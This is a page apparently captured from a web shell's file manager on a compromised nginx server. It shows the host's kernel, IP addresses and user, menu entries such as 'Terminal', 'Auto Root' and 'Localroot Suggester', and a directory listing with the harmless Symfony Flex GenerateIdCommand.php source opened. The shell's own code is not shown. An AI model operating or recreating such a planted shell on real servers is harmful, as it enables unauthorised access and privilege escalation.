Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 216.73.216.49
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
vendor /
symfony /
flex /
src /
Command /
Delete
Unzip
Name
Size
Permission
Date
Action
DumpEnvCommand.php
4.76
KB
-rw-rw-r--
2022-08-07 09:39
GenerateIdCommand.php
985
B
-rw-rw-r--
2022-08-07 09:39
InstallRecipesCommand.php
7.23
KB
-rw-rw-r--
2022-08-07 09:39
RecipesCommand.php
10.59
KB
-rw-rw-r--
2022-08-07 09:39
UnpackCommand.php
4.25
KB
-rw-rw-r--
2022-08-07 09:39
UpdateRecipesCommand.php
15.12
KB
-rw-rw-r--
2022-08-07 09:39
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Flex\Command; use Symfony\Component\Console\Command\Command; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; use Symfony\Component\Console\Style\SymfonyStyle; class GenerateIdCommand extends Command { public function __construct() { // No-op to support downgrading to v1.12.x parent::__construct(); } protected function configure() { $this->setName('symfony:generate-id'); } protected function execute(InputInterface $input, OutputInterface $output): int { $ui = new SymfonyStyle($input, $output); $ui->error('This command is a noop and should not be used anymore.'); return 1; } }